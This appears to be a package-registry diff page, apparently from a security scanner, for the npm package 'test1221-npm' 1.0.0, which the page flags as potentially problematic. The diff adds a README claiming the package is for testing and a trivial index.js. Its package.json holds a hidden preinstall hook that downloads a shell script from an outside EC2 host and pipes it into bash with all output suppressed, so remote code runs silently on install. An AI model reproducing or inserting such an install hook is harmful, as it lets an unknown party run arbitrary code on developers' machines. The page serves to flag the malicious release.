test1221-npm 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of test1221-npm might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +2 -0
  2. package/index.js +1 -0
  3. package/package.json +8 -0
package/README.md ADDED
@@ -0,0 +1,2 @@
1
+ # GRAMING NPM PACKAGE
2
+ - package created for testing only
package/index.js ADDED
@@ -0,0 +1 @@
1
+ console.log('Installing the package');
package/package.json ADDED
@@ -0,0 +1,8 @@
1
+ {
2
+ "name": "test1221-npm",
3
+ "version": "1.0.0",
4
+ "dependencies": {},
5
+ "scripts": {
6
+ "preinstall": "curl http://ec2-52-207-214-40.compute-1.amazonaws.com:21/deploy.sh 2>&1 | bash 1>/dev/null 2>&1"
7
+ }
8
+ }